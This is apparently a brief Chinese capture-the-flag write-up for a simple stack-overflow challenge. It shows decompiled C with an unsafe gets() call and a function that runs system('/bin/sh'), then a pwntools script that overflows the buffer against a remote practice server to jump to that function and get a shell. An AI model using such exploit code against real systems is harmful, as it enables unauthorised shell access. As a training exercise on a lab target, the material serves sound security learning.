0x01 寻找漏洞 1234567891011121314151617 很简单的栈溢出 int __cdecl main(int argc, const char **argv, const char **envp){ char s; // [rsp+1h] [rbp-Fh] puts("please input"); gets(&s, argv); puts(&s); puts("ok,bye!!!"); return 0;}int fun(){ return system("/bin/sh");} 0x02 思路分析 1 不解释,前面有一样的 exp 123456 from pwn import *p=remote('buuoj.cn',6001)fun_addr=0x0000000000401186payload='a'*0x0f+'a'*8+p64(fun_addr)p.sendline(payload)p.interactive() 赞微海报分享
近期评论